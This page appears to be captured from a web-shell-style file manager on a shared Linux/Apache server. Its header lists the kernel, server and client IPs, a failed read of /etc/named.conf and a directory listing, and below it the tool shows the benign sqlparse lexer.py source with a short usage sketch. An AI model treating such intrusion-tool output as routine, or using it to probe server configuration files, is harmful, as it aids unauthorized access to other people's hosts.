Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Server: Apache
Server IP: 67.205.6.31 | Client IP: 216.73.216.13
Can't read [ /etc/named.conf ]
PHP: 8.2.29
User: fernandoquevedo
Path: /usr/lib/python3/dist-packages/sqlparse/
Name            Size       Permission
__pycache__     [ DIR ]    drwxr-xr-x
engine          [ DIR ]    drwxr-xr-x
filters         [ DIR ]    drwxr-xr-x
__init__.py     2.13 KB    -rw-r--r--
__main__.py     610 B      -rw-r--r--
cli.py          5.58 KB    -rw-r--r--
exceptions.py   342 B      -rw-r--r--
formatter.py    7.39 KB    -rw-r--r--
keywords.py     28.86 KB   -rw-r--r--
lexer.py        2.4 KB     -rw-r--r--
sql.py          20.18 KB   -rw-r--r--
tokens.py       1.62 KB    -rw-r--r--
utils.py        3.36 KB    -rw-r--r--
Code Editor: lexer.py
#
# Copyright (C) 2009-2020 the sqlparse authors and contributors
# <see AUTHORS file>
#
# This module is part of python-sqlparse and is released under
# the BSD License: https://opensource.org/licenses/BSD-3-Clause

"""SQL Lexer"""

# This code is based on the SqlLexer in pygments.
# http://pygments.org/
# It's separated from the rest of pygments to increase performance
# and to allow some customizations.

from io import TextIOBase

from sqlparse import tokens
from sqlparse.keywords import SQL_REGEX
from sqlparse.utils import consume


class Lexer:
    """Lexer

    Empty class. Leaving for backwards-compatibility.
    """

    @staticmethod
    def get_tokens(text, encoding=None):
        """Return an iterable of (tokentype, value) pairs generated from
        ``text``.

        ``text`` may be a string, a bytes object, or a file-like object.
        Bytes are decoded using ``encoding`` if given, otherwise UTF-8,
        falling back to unicode-escape on a decode error.
        """
        if isinstance(text, TextIOBase):
            text = text.read()

        if isinstance(text, str):
            pass
        elif isinstance(text, bytes):
            if encoding:
                text = text.decode(encoding)
            else:
                try:
                    text = text.decode('utf-8')
                except UnicodeDecodeError:
                    text = text.decode('unicode-escape')
        else:
            raise TypeError("Expected text or file-like object, got {!r}".
                            format(type(text)))

        # Walk the input one character at a time; the first pattern in
        # SQL_REGEX that matches at the current position wins.
        iterable = enumerate(text)
        for pos, char in iterable:
            for rexmatch, action in SQL_REGEX:
                m = rexmatch(text, pos)

                if not m:
                    continue
                elif isinstance(action, tokens._TokenType):
                    yield action, m.group()
                elif callable(action):
                    # Callable actions return the (tokentype, value) pair.
                    yield action(m.group())

                # Skip past the characters consumed by this match.
                consume(iterable, m.end() - pos - 1)
                break
            else:
                yield tokens.Error, char


def tokenize(sql, encoding=None):
    """Tokenize sql.

    Tokenize *sql* using the :class:`Lexer` and return a 2-tuple stream
    of ``(token type, value)`` items.
    """
    return Lexer().get_tokens(sql, encoding)
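For orientation, a minimal usage sketch of the tokenize() entry point defined above. It assumes the sqlparse package is importable; the sample SQL statement is an arbitrary illustration, not taken from this server.

from sqlparse.lexer import tokenize

# Each item is a (tokentype, value) pair,
# e.g. (Token.Keyword.DML, 'SELECT').
for ttype, value in tokenize("SELECT id, name FROM users WHERE id = 1;"):
    print(ttype, repr(value))

Note that no parsing happens here: the stream is flat, and whitespace and punctuation come through as their own tokens.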